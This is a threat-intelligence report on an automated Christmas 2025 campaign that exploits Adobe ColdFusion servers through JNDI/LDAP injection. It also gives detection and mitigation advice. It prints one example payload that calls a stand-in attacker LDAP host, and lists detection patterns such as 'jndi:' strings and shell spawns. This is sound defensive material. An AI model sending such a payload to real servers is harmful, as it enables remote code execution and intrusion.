Executive Summary

A large-scale, automated attack campaign was observed targeting Adobe ColdFusion servers, with a significant spike in activity on Christmas Day, 2025. The campaign, tracked by security firm GreyNoise, was attributed to a single threat actor leveraging infrastructure in Japan. The attacker systematically attempted to exploit over a dozen different vulnerabilities in ColdFusion, including CVE-2023-26360, using JNDI/LDAP injection as the primary payload. This targeted campaign is part of a much broader reconnaissance effort by an initial access broker, who has been observed scanning the internet for 767 distinct CVEs across 47 different technologies. The goal of this operation is likely to gain a foothold in vulnerable networks and then sell that access to other threat actors, such as ransomware groups.

Threat Overview

The threat actor demonstrated a strategic approach by launching the campaign during a major holiday, a time when security teams are often understaffed and response times may be slower. The operation was highly focused, with 98% of the malicious traffic originating from two IP addresses associated with the Japanese hosting provider CTG Server Limited. The actor's use of JNDI/LDAP injection is a common technique for achieving remote code execution (RCE) on Java-based platforms like ColdFusion. The broader context reveals a sophisticated initial access broker (IAB) at work, whose business model is to compromise as many systems as possible to create a sellable inventory of compromised networks for the cybercrime ecosystem.

Technical Analysis

1. Reconnaissance & Scanning: The actor conducted broad, indiscriminate scanning across the internet, targeting a list of 767 known CVEs. The specific focus on Adobe ColdFusion indicates it was identified as a high-value target.

2. Exploitation: The primary attack vector was T1190 - Exploit Public-Facing Application. The attacker sent malicious HTTP requests designed to exploit various ColdFusion vulnerabilities.

3. Payload Delivery: 80% of the observed payloads involved JNDI/LDAP injection. This technique abuses the Java Naming and Directory Interface (JNDI) to trigger a lookup to an attacker-controlled LDAP server. The LDAP server then responds with a reference that causes the victim server to load and execute a remote Java class file, resulting in RCE.

   Example Payload Pattern: ${jndi:ldap://attacker-domain.com/a}
   

4. Objective: The actor's goal is to establish initial access. This involves deploying a simple backdoor or web shell that provides persistent access to the compromised server. This access is then packaged and sold on dark web forums.

Impact Assessment

The immediate impact of a successful compromise is the establishment of an unauthorized foothold in the organization's network. While this initial access may be silent, it is a precursor to more damaging attacks. IABs are a critical part of the cybercrime supply chain, feeding victims to ransomware gangs, data thieves, and nation-state actors. An organization compromised by this campaign could soon find itself facing a ransomware incident, a major data breach, or being used as a pivot point to attack its partners. The financial and reputational damage from such follow-on attacks can be devastating.

Cyber Observables for Detection

Detection & Response

• Web Application Firewall (WAF): Implement WAF rules to detect and block common JNDI/LDAP injection strings in incoming HTTP requests. This provides a critical first line of defense.
• Log Analysis: Aggressively monitor web server, application, and firewall logs for requests containing jndi:. Correlate these attempts with outbound connection attempts from the ColdFusion server to unknown IP addresses on ports like 389 (LDAP) and 1099/1389 (RMI).
• EDR/Process Monitoring: Monitor the ColdFusion process for anomalous behavior, such as spawning shell commands (cmd.exe, /bin/sh) or initiating network connections to untrusted endpoints. This can detect a successful RCE.

Mitigation

• Patch Management: The most effective mitigation is to ensure that all Adobe ColdFusion instances are fully patched against all known vulnerabilities, including older ones from 2023 and 2024. This is a core tenet of D3-SU: Software Update.
• Egress Filtering: Restrict outbound network traffic from your ColdFusion servers. Block outbound connections on ports commonly used for JNDI attacks (e.g., LDAP, RMI) to all but explicitly approved destinations. This implements D3-OTF: Outbound Traffic Filtering.
• Application Hardening: If possible, update Java and ColdFusion configurations to disable remote class loading and harden JNDI settings to prevent lookups to untrusted sources. This aligns with D3-ACH: Application Configuration Hardening.
• Reduce Attack Surface: If ColdFusion is not essential, decommission it. If it is, ensure that only necessary components are exposed to the internet.